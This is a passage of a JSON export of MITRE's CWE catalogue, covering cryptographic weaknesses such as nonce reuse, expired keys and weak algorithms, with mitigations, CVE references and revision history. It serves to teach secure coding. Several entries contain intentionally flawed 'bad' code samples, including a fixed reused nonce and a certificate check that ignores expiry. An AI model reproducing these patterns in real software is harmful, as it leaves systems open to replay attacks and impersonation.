authentication"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-18"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 23: Improper Use of PKI, Especially SSL.&#34; Page 347"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 2, &#34;Untrustworthy Credentials&#34;, Page 37"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-10","Modification_Comment":"clarified the description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Applicable_Platforms, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, References, Relationships"}]}},"323":{"attr":{"@_ID":"323","@_Name":"Reusing a Nonce, Key Pair in Encryption","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Nonces should be used for the present occasion and only once.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"344","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"Nonces are often bundled with a key in a communication exchange to produce a new session key for each exchange."},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"Potentially a replay attack, in which an attacker could send the same data twice, could be crafted if nonces are allowed to be reused. This could allow a user to send a message which masquerades as a valid message from a valid user."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Refuse to reuse nonce values."},{"Phase":"Implementation","Description":"Use techniques such as requiring incrementing, time based and/or challenge response to assure uniqueness of nonces."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This code takes a password, concatenates it with a nonce, then encrypts it before sending over a network:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void encryptAndSendPassword(char *password){}","xhtml:div":{"#text":"char *nonce = \\"bad\\";...char *data = (unsigned char*)malloc(20);int para_size = strlen(nonce) + strlen(password);char *paragraph = (char*)malloc(para_size);SHA1((const unsigned char*)paragraph,parsize,(unsigned char*)data);sendEncryptedData(data)","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","",""]}}},"Body_Text":"Because the nonce used is always the same, an attacker can impersonate a trusted party by intercepting and resending the encrypted password. This attack avoids the need to learn the unencrypted password."},{"Intro_Text":"This code sends a command to a remote server, using an encrypted password and nonce to prove the command is from a trusted party:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C++"},"xhtml:div":{"#text":"String command = new String(\\"some command to execute\\");MessageDigest nonce = MessageDigest.getInstance(\\"SHA\\");nonce.update(String.valueOf(\\"bad nonce\\"));byte[] nonce = nonce.digest();MessageDigest password = MessageDigest.getInstance(\\"SHA\\");password.update(nonce + \\"secretPassword\\");byte[] digest = password.digest();sendCommand(digest, command)","xhtml:br":["","","","","","",""]}},"Body_Text":"Once again the nonce used is always the same. An attacker may be able to replay previous legitimate commands or execute new arbitrary commands."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Reusing a nonce, key pair in encryption"}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Background_Details, Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References"}]}},"324":{"attr":{"@_ID":"324","@_Name":"Use of a Key Past its Expiration Date","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product uses a cryptographic key or password past its expiration date, which diminishes its safety significantly by increasing the timing window for cracking attacks against that key.","Extended_Description":"While the expiration of keys does not necessarily ensure that they are compromised, it is a significant concern that keys which remain in use for prolonged periods of time have a decreasing probability of integrity. For this reason, it is important to replace keys within a period of time proportional to their strength.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"672","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"298","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":["Bypass Protection Mechanism","Gain Privileges or Assume Identity"],"Note":"The cryptographic key in question may be compromised, providing a malicious user with a method for authenticating as the victim."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Adequate consideration should be put in to the user interface in order to notify users previous to the key\'s expiration, to explain the importance of new key generation and to walk users through the process as painlessly as possible."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code attempts to verify that a certificate is valid.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"if (cert = SSL_get_peer_certificate(ssl)) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"foo=SSL_get_verify_result(ssl);if ((X509_V_OK==foo) || (X509_V_ERRCERT_NOT_YET_VALID==foo))","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"xhtml:br":["",""],"xhtml:i":"//do stuff"}}}}}},"Body_Text":"The code checks if the certificate is not yet valid, but it fails to check if a certificate is past its expiration date, thus treating expired certificates as valid."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Using a key past its expiration date"}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 23: Improper Use of PKI, Especially SSL.&#34; Page 347"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Demonstrative_Examples, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated References"}],"Previous_Entry_Name":{"#text":"Using a Key Past its Expiration Date","attr":{"@_Date":"2008-04-11"}}}},"325":{"attr":{"@_ID":"325","@_Name":"Missing Cryptographic Step","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not implement a required step in a cryptographic algorithm, resulting in weaker encryption than advertised by the algorithm.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"573","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"358","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation","Note":"Developers sometimes omit \\"expensive\\" (resource-intensive) steps in order to improve performance, especially in devices with limited memory or slower CPUs. This step may be taken under a mistaken impression that the step is unnecessary for the cryptographic algorithm."},{"Phase":"Architecture and Design"},{"Phase":"Requirements","Note":"This issue may happen when the requirements for the cryptographic algorithm are not clearly stated."}]},"Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"},{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data"]},{"Scope":["Accountability","Non-Repudiation"],"Impact":"Hide Activities"}]},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2001-1585","Description":"Missing challenge-response step allows authentication bypass using public key.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1585"}},"Functional_Areas":{"Functional_Area":"Cryptography"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Missing Required Cryptographic Step"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A8","Entry_Name":"Insecure Cryptographic Storage","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A9","Entry_Name":"Insecure Communications","Mapping_Fit":"CWE More Specific"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"68"}}},"Notes":{"Note":[{"#text":"Overlaps incomplete/missing security check.","attr":{"@_Type":"Relationship"}},{"#text":"Can be resultant.","attr":{"@_Type":"Relationship"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Functional_Areas, Modes_of_Introduction, Relationships, Observed_Example, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Common_Consequences, Description, Modes_of_Introduction, Name"}],"Previous_Entry_Name":{"#text":"Missing Required Cryptographic Step","attr":{"@_Date":"2020-08-20"}}}},"326":{"attr":{"@_ID":"326","@_Name":"Inadequate Encryption Strength","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software stores or transmits sensitive data using an encryption scheme that is theoretically sound, but is not strong enough for the level of protection required.","Extended_Description":"A weak encryption scheme can be subjected to brute force attacks that have a reasonable chance of succeeding using current attack methods and resources.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Confidentiality"],"Impact":["Bypass Protection Mechanism","Read Application Data"],"Note":"An attacker may be able to decrypt the data using brute force attacks."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Use an encryption scheme that is currently considered to be strong by experts in the field."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-1546","Description":"Weak encryption","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1546"},{"Reference":"CVE-2004-2172","Description":"Weak encryption (chosen plaintext attack)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2172"},{"Reference":"CVE-2002-1682","Description":"Weak encryption","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1682"},{"Reference":"CVE-2002-1697","Description":"Weak encryption produces same ciphertext from the same plaintext blocks.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1697"},{"Reference":"CVE-2002-1739","Description":"Weak encryption","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1739"},{"Reference":"CVE-2005-2281","Description":"Weak encryption scheme","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2281"},{"Reference":"CVE-2002-1872","Description":"Weak encryption (XOR)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1872"},{"Reference":"CVE-2002-1910","Description":"Weak encryption (reversible algorithm).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1910"},{"Reference":"CVE-2002-1946","Description":"Weak encryption (one-to-one mapping).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1946"},{"Reference":"CVE-2002-1975","Description":"Encryption error uses fixed salt, simplifying brute force / dictionary attacks (overlaps randomness).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1975"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Weak Encryption"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A8","Entry_Name":"Insecure Cryptographic Storage","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A9","Entry_Name":"Insecure Communications","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A8","Entry_Name":"Insecure Storage","Mapping_Fit":"CWE More Specific"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"112"}},{"attr":{"@_CAPEC_ID":"192"}},{"attr":{"@_CAPEC_ID":"20"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 8, &#34;Cryptographic Foibles&#34; Page 259"}},{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 21: Using the Wrong Cryptography.&#34; Page 315"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Maintenance_Notes, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-08","Modification_Importance":"Critical","Modification_Comment":"Clarified entry to focus on algorithms that do not have major weaknesses, but may not be strong enough for some purposes."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Common_Consequences, Description, Maintenance_Notes, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Maintenance_Notes, Potential_Mitigations, Relationships"}],"Previous_Entry_Name":{"#text":"Weak Encryption","attr":{"@_Date":"2009-07-27"}}}},"327":{"attr":{"@_ID":"327","@_Name":"Use of a Broken or Risky Cryptographic Algorithm","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The use of a broken or risky cryptographic algorithm is an unnecessary risk that may result in the exposure of sensitive information.","Extended_Description":"The use of a non-standard algorithm is dangerous because a determined attacker may be able to break the algorithm and compromise whatever data has been protected. Well-known techniques may exist to break the algorithm.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"311","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":{"xhtml:p":["Cryptographic algorithms are the methods by which data is scrambled. There are a small number of well-understood and heavily studied algorithms that should be used by most applications. It is quite difficult to produce a secure algorithm, and even high profile algorithms by accomplished cryptographic experts have been broken.","Since the state of cryptography advances so rapidly, it is common for an algorithm to be considered \\"unsafe\\" even if it was once thought to be strong. This can happen when new attacks against the algorithm are discovered, or if computing power increases so much that the cryptographic algorithm no longer provides the amount of protection that was originally thought."]}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design","Note":"COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic."}},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"The confidentiality of sensitive data may be compromised by the use of a broken or risky cryptographic algorithm."},{"Scope":"Integrity","Impact":"Modify Application Data","Note":"The integrity of sensitive data may be compromised by the use of a broken or risky cryptographic algorithm."},{"Scope":["Accountability","Non-Repudiation"],"Impact":"Hide Activities","Note":"If the cryptographic algorithm is used to ensure the identity of the source of the data (such as digital signatures), then a broken algorithm will compromise this scheme and the source of the data cannot be proven."}]},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Analysis","Description":"Automated methods may be useful for recognizing commonly-used libraries or features that have become obsolete.","Effectiveness":"Moderate","Effectiveness_Notes":"False negatives may occur if the tool is not aware of the cryptographic libraries in use, or if custom cryptography is being used."},{"attr":{"@_Detection_Method_ID":"DM-7"},"Method":"Manual Analysis","Description":"This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.","Effectiveness_Notes":"These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis","Binary / Bytecode simple extractor - strings, ELF readers, etc."]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Binary / Bytecode disassembler - then use manual analysis for vulnerabilities &amp; anomalies"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Man-in-the-middle attack tool"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Framework-based Fuzzer","Automated Monitored Execution","Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious"]}}]}},"Effectiveness":"High"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Configuration Checker"}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-24"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["When there is a need to store or transmit sensitive data, use strong, up-to-date cryptographic algorithms to encrypt that data. Select a well-vetted algorithm that is currently considered to be strong by experts in the field, and use well-tested implementations. As with all cryptographic mechanisms, the source code should be available for analysis.","For example, US government systems require FIPS 140-2 certification.","Do not develop custom or private cryptographic algorithms. They will likely be exposed to attacks that are well-understood by cryptographers. Reverse engineering techniques are mature. If the algorithm can be compromised if attackers find out how it works, then it is especially weak.","Periodically ensure that the cryptography has not become obsolete. Some older algorithms, once thought to require a billion years of computing time, can now be broken in days or hours. This includes MD4, MD5, SHA1, DES, and other algorithms that were once regarded as strong. [REF-267]"]}},{"attr":{"@_Mitigation_ID":"MIT-52"},"Phase":"Architecture and Design","Description":"Ensure that the design allows one cryptographic algorithm can be replaced with another in the next generation or version. Where possible, use wrappers to make the interfaces uniform. This will make it easier to upgrade to stronger algorithms. This is especially important for hardware, which can be more difficult to upgrade quickly than software.","Effectiveness":"Defense in Depth"},{"Phase":"Architecture and Design","Description":"Carefully manage and protect cryptographic keys (see CWE-320). If the keys can be guessed or stolen, then the strength of the cryptography itself is irrelevant."},{"attr":{"@_Mitigation_ID":"MIT-4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","Industry-standard implementations will save development time and may be more likely to avoid errors that can occur during implementation of cryptographic algorithms. Consider the ESAPI Encryption feature."]}},{"attr":{"@_Mitigation_ID":"MIT-25"},"Phase":["Implementation","Architecture and Design"],"Description":"When using industry-approved techniques, use them correctly. Don\'t cut corners by skipping resource-intensive steps (CWE-325). These steps are often essential for preventing common attacks."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"These code examples use the Data 